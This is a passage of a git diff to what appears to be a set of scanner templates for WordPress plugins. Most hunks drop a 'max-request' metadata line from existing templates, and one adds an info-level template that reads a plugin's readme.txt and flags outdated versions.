b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml new file mode 100644 index 0000000000..e085f30e5a --- /dev/null +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -0,0 +1,49 @@ +id: wordpress-pinterest-for-woocommerce + +info: + name: Pinterest for WooCommerce Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/pinterest-for-woocommerce/ + metadata: + plugin_namespace: pinterest-for-woocommerce + wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/pinterest-for-woocommerce/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/pinterest-for-woocommerce.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 